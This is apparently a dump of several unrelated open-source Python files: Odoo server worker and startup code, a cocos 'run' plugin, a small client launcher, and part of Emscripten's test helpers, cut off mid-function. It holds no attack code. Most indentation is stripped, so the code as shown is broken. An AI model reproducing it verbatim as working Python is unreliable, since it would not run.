# receiving the full reply
try:
self.server.process_request(client, addr)
except IOError as e:
if e.errno != errno.EPIPE:
raise
self.request_count += 1
def process_work(self):
try:
client, addr = self.multi.socket.accept()
self.process_request(client, addr)
except socket.error as e:
if e.errno not in (errno.EAGAIN, errno.ECONNABORTED):
raise
def start(self):
Worker.start(self)
self.server = BaseWSGIServerNoBind(self.multi.app)
class WorkerCron(Worker):
""" Cron workers """
def __init__(self, multi):
super(WorkerCron, self).__init__(multi)
        # process_work() below processes a single database per call.
        # The variable db_index keeps track of the next database to
        # process.
self.db_index = 0
self.watchdog_timeout = multi.cron_timeout # Use a distinct value for CRON Worker
def sleep(self):
# Really sleep once all the databases have been processed.
if self.db_index == 0:
interval = SLEEP_INTERVAL + self.pid % 10 # chorus effect
# simulate interruptible sleep with select(wakeup_fd, timeout)
try:
select.select([self.wakeup_fd_r], [], [], interval)
# clear wakeup pipe if we were interrupted
empty_pipe(self.wakeup_fd_r)
except select.error as e:
if e.args[0] != errno.EINTR:
raise
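        # Illustrative example of the "chorus effect" above: with a hypothetical
        # SLEEP_INTERVAL of 60, workers with pids 1234 and 1237 sleep 64s and
        # 67s respectively, so they do not all poll the databases at once.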
def _db_list(self):
if config['db_name']:
db_names = config['db_name'].split(',')
else:
db_names = odoo.service.db.list_dbs(True)
return db_names
def process_work(self):
rpc_request = logging.getLogger('odoo.netsvc.rpc.request')
rpc_request_flag = rpc_request.isEnabledFor(logging.DEBUG)
_logger.debug("WorkerCron (%s) polling for jobs", self.pid)
db_names = self._db_list()
if len(db_names):
self.db_index = (self.db_index + 1) % len(db_names)
db_name = db_names[self.db_index]
self.setproctitle(db_name)
if rpc_request_flag:
start_time = time.time()
start_memory = memory_info(psutil.Process(os.getpid()))
from odoo.addons import base
base.models.ir_cron.ir_cron._acquire_job(db_name)
            # don't keep cursors in multi-database mode
if len(db_names) > 1:
odoo.sql_db.close_db(db_name)
if rpc_request_flag:
run_time = time.time() - start_time
end_memory = memory_info(psutil.Process(os.getpid()))
vms_diff = (end_memory - start_memory) / 1024
logline = '%s time:%.3fs mem: %sk -> %sk (diff: %sk)' % \
(db_name, run_time, start_memory / 1024, end_memory / 1024, vms_diff)
_logger.debug("WorkerCron (%s) %s", self.pid, logline)
self.request_count += 1
if self.request_count >= self.request_max and self.request_max < len(db_names):
_logger.error("There are more dabatases to process than allowed "
"by the `limit_request` configuration variable: %s more.",
len(db_names) - self.request_max)
else:
self.db_index = 0
def start(self):
os.nice(10) # mommy always told me to be nice with others...
Worker.start(self)
if self.multi.socket:
self.multi.socket.close()
#----------------------------------------------------------
# start/stop public api
#----------------------------------------------------------
server = None
def load_server_wide_modules():
server_wide_modules = {'base', 'web'} | set(odoo.conf.server_wide_modules)
for m in server_wide_modules:
try:
odoo.modules.module.load_openerp_module(m)
except Exception:
msg = ''
if m == 'web':
msg = """
The `web` module is provided by the addons found in the `openerp-web` project.
Maybe you forgot to add those addons in your addons_path configuration."""
_logger.exception('Failed to load server-wide module `%s`.%s', m, msg)
def _reexec(updated_modules=None):
"""reexecute openerp-server process with (nearly) the same arguments"""
if odoo.tools.osutil.is_running_as_nt_service():
subprocess.call('net stop {0} && net start {0}'.format(nt_service_name), shell=True)
exe = os.path.basename(sys.executable)
args = stripped_sys_argv()
if updated_modules:
args += ["-u", ','.join(updated_modules)]
if not args or args[0] != exe:
args.insert(0, exe)
    # We should keep the LISTEN_* environment variables in order to support socket activation on reexec
os.execve(sys.executable, args, os.environ)
def load_test_file_py(registry, test_file):
threading.currentThread().testing = True
try:
test_path, _ = os.path.splitext(os.path.abspath(test_file))
for mod in [m for m in get_modules() if '/%s/' % m in test_file]:
for mod_mod in get_test_modules(mod):
mod_path, _ = os.path.splitext(getattr(mod_mod, '__file__', ''))
if test_path == mod_path:
suite = unittest.TestSuite()
for t in unittest.TestLoader().loadTestsFromModule(mod_mod):
suite.addTest(t)
_logger.log(logging.INFO, 'running tests %s.', mod_mod.__name__)
result = odoo.modules.module.OdooTestRunner().run(suite)
success = result.wasSuccessful()
if hasattr(registry._assertion_report,'report_result'):
registry._assertion_report.report_result(success)
if not success:
_logger.error('%s: at least one error occurred in a test', test_file)
return
finally:
threading.currentThread().testing = False
def preload_registries(dbnames):
""" Preload a registries, possibly run a test file."""
    # TODO: move all config checks to args, don't check tools.config here
dbnames = dbnames or []
rc = 0
for dbname in dbnames:
try:
update_module = config['init'] or config['update']
registry = Registry.new(dbname, update_module=update_module)
# run test_file if provided
if config['test_file']:
test_file = config['test_file']
if not os.path.isfile(test_file):
_logger.warning('test file %s cannot be found', test_file)
elif not test_file.endswith('py'):
_logger.warning('test file %s is not a python file', test_file)
else:
_logger.info('loading test file %s', test_file)
with odoo.api.Environment.manage():
load_test_file_py(registry, test_file)
# run post-install tests
if config['test_enable']:
t0 = time.time()
t0_sql = odoo.sql_db.sql_counter
module_names = (registry.updated_modules if update_module else
registry._init_modules)
_logger.info("Starting post tests")
with odoo.api.Environment.manage():
for module_name in module_names:
result = run_unit_tests(module_name, position='post_install')
registry._assertion_report.record_result(result)
_logger.info("All post-tested in %.2fs, %s queries",
time.time() - t0, odoo.sql_db.sql_counter - t0_sql)
if registry._assertion_report.failures:
rc += 1
except Exception:
_logger.critical('Failed to initialize database `%s`.', dbname, exc_info=True)
return -1
return rc
def start(preload=None, stop=False):
""" Start the odoo http server and cron processor.
"""
global server
load_server_wide_modules()
odoo.service.wsgi_server._patch_xmlrpc_marshaller()
if odoo.evented:
server = GeventServer(odoo.service.wsgi_server.application)
elif config['workers']:
if config['test_enable'] or config['test_file']:
_logger.warning("Unit testing in workers mode could fail; use --workers 0.")
server = PreforkServer(odoo.service.wsgi_server.application)
# Workaround for Python issue24291, fixed in 3.6 (see Python issue26721)
if sys.version_info[:2] == (3,5):
# turn on buffering also for wfile, to avoid partial writes (Default buffer = 8k)
werkzeug.serving.WSGIRequestHandler.wbufsize = -1
else:
if platform.system() == "Linux" and sys.maxsize > 2**32 and "MALLOC_ARENA_MAX" not in os.environ:
# glibc's malloc() uses arenas [1] in order to efficiently handle memory allocation of multi-threaded
# applications. This allows better memory allocation handling in case of multiple threads that
# would be using malloc() concurrently [2].
            # Due to Python's GIL, this optimization has no effect on multithreaded Python programs.
            # Unfortunately, a downside of creating one arena per CPU core is the increase in virtual memory,
            # which Odoo relies on in order to limit the memory usage of threaded workers.
            # On 32bit systems the default size of an arena is 512K while on 64bit systems it's 64M [3],
            # hence a threaded worker will quickly reach its default memory soft limit upon concurrent requests.
            # We therefore set the maximum number of arenas to 2 unless the MALLOC_ARENA_MAX env variable is set.
            # Note: setting MALLOC_ARENA_MAX=0 explicitly restores glibc's default malloc() behaviour.
#
# [1] https://sourceware.org/glibc/wiki/MallocInternals#Arenas_and_Heaps
# [2] https://www.gnu.org/software/libc/manual/html_node/The-GNU-Allocator.html
# [3] https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=00ce48c;hb=0a8262a#l862
try:
import ctypes
libc = ctypes.CDLL("libc.so.6")
M_ARENA_MAX = -8
assert libc.mallopt(ctypes.c_int(M_ARENA_MAX), ctypes.c_int(2))
except Exception:
_logger.warning("Could not set ARENA_MAX through mallopt()")
server = ThreadedServer(odoo.service.wsgi_server.application)
watcher = None
if 'reload' in config['dev_mode'] and not odoo.evented:
if inotify:
watcher = FSWatcherInotify()
watcher.start()
elif watchdog:
watcher = FSWatcherWatchdog()
watcher.start()
else:
if os.name == 'posix' and platform.system() != 'Darwin':
module = 'inotify'
else:
module = 'watchdog'
_logger.warning("'%s' module not installed. Code autoreload feature is disabled", module)
if 'werkzeug' in config['dev_mode']:
server.app = DebuggedApplication(server.app, evalex=True)
rc = server.run(preload, stop)
if watcher:
watcher.stop()
# like the legend of the phoenix, all ends with beginnings
if getattr(odoo, 'phoenix', False):
_reexec()
return rc if rc else 0
def restart():
""" Restart the server
"""
if os.name == 'nt':
# run in a thread to let the current thread return response to the caller.
threading.Thread(target=_reexec).start()
else:
os.kill(server.pid, signal.SIGHUP)
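# A minimal sketch (hypothetical command line) of how the pieces above fit
# together: `odoo-bin --workers=4 --max-cron-threads=2` makes start() build a
# PreforkServer, which forks WorkerHTTP and WorkerCron processes and supervises
# them through process_signals(), process_zombie() and process_spawn().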
|
project_run.py
|
#!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Author: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
import BaseHTTPServer
import webbrowser
import threading
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return "Compiles & deploy project and then runs it on the target"
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help="Set the run mode, should be debug|release, default is debug.")
group = parser.add_argument_group("web project arguments")
group.add_argument("-b", "--browser", dest="browser",
help="Specify the browser to open the url. Use the system default browser if not specified.")
group.add_argument("port", metavar="SERVER_PORT", nargs='?', default='8000',
help="Set the port of the local web server, defualt is 8000")
group.add_argument("--host", dest="host", metavar="SERVER_HOST", nargs='?', default='127.0.0.1',
help="Set the host of the local web server, defualt is 127.0.0.1")
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
self._host = args.host
self._browser = args.browser
def get_ios_sim_name(self):
# get the version of xcodebuild
ver = cocos.get_xcode_version()
if ver.startswith("5"):
ret = "ios-sim-xcode5"
else:
ret = "ios-sim-xcode6"
return ret
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
if deploy_dep._use_sdk == 'iphoneos':
cocos.Logging.warning("The generated app is for device. Can't run it on simulator.")
cocos.Logging.warning("The signed app & ipa are generated in path : %s" % os.path.dirname(deploy_dep._iosapp_path))
else:
iossim_exe_path = os.path.join(os.path.dirname(__file__), 'bin', self.get_ios_sim_name())
launch_sim = "%s launch \"%s\" &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = '\"%s/Contents/MacOS/%s\"' % (deploy_dep._macapp_path, deploy_dep.target_name)
self._run_cmd(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(sdk_root, 'platform-tools', 'adb'))
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
pass
def open_webbrowser(self, url):
if self._browser is None:
threading.Event().wait(1)
webbrowser.open_new(url)
else:
if cocos.os_is_mac():
url_cmd = "open -a \"%s\" \"%s\"" % (self._browser, url)
else:
url_cmd = "\"%s\" %s" % (self._browser, url)
self._run_cmd(url_cmd)
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
host = self._host
port = int(self._port)
deploy_dep = dependencies['deploy']
server_address = (host, port)
from threading import Thread
sub_url = deploy_dep.sub_url
url = 'http://%s:%s%s' % (host, port, sub_url)
thread = Thread(target = self.open_webbrowser, args = (url,))
thread.start()
try:
HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
run_root = deploy_dep.run_root
with cocos.pushd(run_root):
cocos.Logging.info("Serving HTTP on %s, port %s ..." % (sa[0], sa[1]))
httpd.serve_forever()
except Exception as e:
cocos.Logging.warning("Start server error ({0}): {1}".format(e.errno, e.strerror))
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info("starting application")
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
|
hpclient.py
|
# Run this script to launch a client and try to connect to a remote
# server defined in the clientconf.toml config file.
from threading import Thread
import hpclient_vulkan as hpclient
# import hpclient_dx12 as hpclient
# import hpclient_gl as hpclient
# Instantiate a new Client.
c = hpclient.Client("clientconf.toml")
# Connect in the background to the server listed in the clientconf.toml file.
Thread(target=c.connect, daemon=True).start()
# Connect in the background to a server with the address given by the first argument.
# Thread(target=c.connect_to, args=("127.0.0.1:8080",), daemon=True).start()
# Print the contents of the Server instance.
print("client contents:")
print(dir(c))
# Start the client's main loop.
c.run()
|
common.py
|
# Copyright 2021 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from enum import Enum
from functools import wraps
from pathlib import Path
from subprocess import PIPE, STDOUT
from urllib.parse import unquote, unquote_plus
from http.server import HTTPServer, SimpleHTTPRequestHandler
import contextlib
import difflib
import hashlib
import logging
import multiprocessing
import os
import re
import shlex
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import time
import webbrowser
import unittest
import clang_native
import jsrun
from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import get_canonical_temp_dir, try_delete, path_from_root
from tools.utils import MACOS, WINDOWS, read_file, read_binary, write_file, write_binary, exit_with_error
from tools import shared, line_endings, building, config
logger = logging.getLogger('common')
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser.
# There are two special values that can be used here if running in an actual
# browser is not desired:
# EMTEST_BROWSER=0 : This will disable the actual running of the test and simply
# verify that it compiles and links.
# EMTEST_BROWSER=node : This will attempt to run the browser test under node.
# For most browser tests this does not work, but it can
# be useful for running pthread tests under node.
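# Hypothetical examples of how this variable might be set when invoking the
# browser test suite (the test name below is made up for illustration):
#   EMTEST_BROWSER="firefox -profile /tmp/ff-profile" tests/runner.py browser
#   EMTEST_BROWSER=node tests/runner.py browser.test_example_pthread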
EMTEST_BROWSER = None
EMTEST_DETECT_TEMPFILE_LEAKS = None
EMTEST_SAVE_DIR = None
# Generally JS engines are equivalent, so testing one is enough. Set this
# to force testing on all JS engines; useful for finding JS-engine bugs.
EMTEST_ALL_ENGINES = None
EMTEST_SKIP_SLOW = None
EMTEST_LACKS_NATIVE_CLANG = None
EMTEST_VERBOSE = None
EMTEST_REBASELINE = None
EMTEST_FORCE64 = None
# Verbosity level control for subprocess calls to configure + make.
# 0: disabled.
# 1: Log stderr of configure/make.
# 2: Log stdout and stderr of configure/make. Print out subprocess commands that were executed.
# 3: Log stdout and stderr, and pass VERBOSE=1 to CMake/configure/make steps.
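# For instance (hypothetical invocation, illustrative test name), to debug a
# failing library build one might run:
#   EMTEST_BUILD_VERBOSE=3 tests/runner.py other.test_some_library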
EMTEST_BUILD_VERBOSE = int(os.getenv('EMTEST_BUILD_VERBOSE', '0'))
if 'EM_BUILD_VERBOSE' in os.environ:
exit_with_error('EM_BUILD_VERBOSE has been renamed to EMTEST_BUILD_VERBOSE')
# Special value for passing to assert_returncode which means we expect that program
# to fail with non-zero return code, but we don't care about specifically which one.
NON_ZERO = -1
TEST_ROOT = path_from_root('tests')
WEBIDL_BINDER = shared.bat_suffix(path_from_root('tools/webidl_binder'))
EMBUILDER = shared.bat_suffix(path_from_root('embuilder'))
EMMAKE = shared.bat_suffix(path_from_root('emmake'))
WASM_DIS = Path(building.get_binaryen_bin(), 'wasm-dis')
LLVM_OBJDUMP = os.path.expanduser(shared.build_llvm_tool_path(shared.exe_suffix('llvm-objdump')))
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
# TODO(sbc): Should we make try_delete have a stronger guarantee?
assert not os.path.exists(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return str(Path(TEST_ROOT, *path_components))
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
def compiler_for(filename, force_c=False):
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
return EMXX
else:
return EMCC
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
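# A minimal usage sketch (hypothetical test method): wrapping a test so it is
# skipped whenever self.is_wasm() returns False:
#
#   def test_wasm_only(self):
#     ...
#   test_wasm_only = skip_if(test_wasm_only, 'is_wasm', 'requires wasm', negate=True)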
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
self.check_dylink()
return func(self, *args, **kwargs)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def requires_node(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_node()
return func(self, *args, **kwargs)
return decorated
def requires_v8(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_v8()
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
@wraps(f)
def decorated(self, *args, **kwargs):
self.setup_node_pthreads()
f(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
  # Setting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
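# Example usage (the variable names are illustrative): set one variable and
# clear another for the duration of the block; the original environment is
# restored afterwards even if the block raises:
#
#   with env_modify({'EMCC_DEBUG': '1', 'EMCC_CORES': None}):
#     ...  # code here sees EMCC_DEBUG set and EMCC_CORES removed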
# Decorator version of env_modify
def with_env_modify(updates):
assert not callable(updates)
def decorated(f):
def modified(self, *args, **kwargs):
with env_modify(updates):
return f(self, *args, **kwargs)
return modified
return decorated
def also_with_minimal_runtime(f):
assert callable(f)
def metafunc(self, with_minimal_runtime):
assert self.get_setting('MINIMAL_RUNTIME') is None
if with_minimal_runtime:
self.set_setting('MINIMAL_RUNTIME', 1)
f(self)
metafunc._parameterize = {'': (False,),
'minimal_runtime': (True,)}
return metafunc
def also_with_wasm_bigint(f):
assert callable(f)
def metafunc(self, with_bigint):
if with_bigint:
if not self.is_wasm():
self.skipTest('wasm2js does not support WASM_BIGINT')
if self.get_setting('WASM_BIGINT') is not None:
self.skipTest('redundant in bigint test config')
self.set_setting('WASM_BIGINT')
self.require_node()
self.node_args.append('--experimental-wasm-bigint')
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'bigint': (True,)}
return metafunc
def ensure_dir(dirname):
dirname = Path(dirname)
dirname.mkdir(parents=True, exist_ok=True)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
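# For example (illustrative): limit_size('x' * 6000) returns the first 5000
# characters of that single line followed by '[..]' and a newline, because the
# line exceeds the default 5000-character max_line limit.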
def create_file(name, contents, binary=False):
name = Path(name)
assert not name.is_absolute()
if binary:
name.write_bytes(contents)
else:
name.write_text(contents)
def make_executable(name):
Path(name).chmod(stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
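# For instance (illustrative only), a method declared as
#   @parameterized({'': (0,), 'O3': (1,)})
#   def test_foo(self, use_o3): ...
# is expanded by this metaclass into two tests, test_foo and test_foo_O3, each
# calling the original body with the corresponding positional argument.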
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('MEMORY64'):
self.skipTest('MEMORY64 does not yet support dynamic linking')
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in ASan yet')
if '-fsanitize=leak' in self.emcc_args:
self.skipTest('no dynamic linking support in LSan yet')
if '-fsanitize=undefined' in self.emcc_args:
self.skipTest('no dynamic linking support in UBSan yet')
def require_v8(self):
if not config.V8_ENGINE or config.V8_ENGINE not in config.JS_ENGINES:
if 'EMTEST_SKIP_V8' in os.environ:
self.skipTest('test requires v8 and EMTEST_SKIP_V8 is set')
else:
self.fail('d8 required to run this test. Use EMTEST_SKIP_V8 to skip')
self.js_engines = [config.V8_ENGINE]
self.emcc_args.append('-sENVIRONMENT=shell')
def require_node(self):
if not config.NODE_JS or config.NODE_JS not in config.JS_ENGINES:
if 'EMTEST_SKIP_NODE' in os.environ:
self.skipTest('test requires node and EMTEST_SKIP_NODE is set')
else:
self.fail('node required to run this test. Use EMTEST_SKIP_NODE to skip')
if self.get_setting('MEMORY64') == 1:
self.skipTest("MEMORY64=1 tests don't yet run under node")
self.js_engines = [config.NODE_JS]
def setup_node_pthreads(self):
self.require_node()
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MEMORY64'):
self.skipTest('node pthreads not yet supported with MEMORY64')
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super().setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super().setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror', '-Wno-limited-postlink-optimizations']
# We want to be strict about closure warnings in our test code.
# TODO(sbc): Remove this if we make it the default for `-Werror`:
# https://github.com/emscripten-core/emscripten/issues/16205):
self.ldflags = ['-sCLOSURE_WARNINGS=error']
self.node_args = [
      # Increase stack trace limit to maximise usefulness of test failure reports
'--stack-trace-limit=50',
# Opt in to node v15 default behaviour:
# https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode
'--unhandled-rejections=throw',
      # Include backtrace for all uncaught exceptions (not just Error).
'--trace-uncaught',
]
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
self.js_engines = config.JS_ENGINES.copy()
self.wasm_engines = config.WASM_ENGINES.copy()
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when --save-dir is used we still try to start with an empty directory as many tests
# expect this. --no-clean can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not DEBUG:
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key, default=None):
return self.settings_mods.get(key, default)
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
if type(value) == bool:
value = int(value)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret.append(f'-s{key}')
elif type(value) == list:
ret.append(f'-s{key}={",".join(value)}')
else:
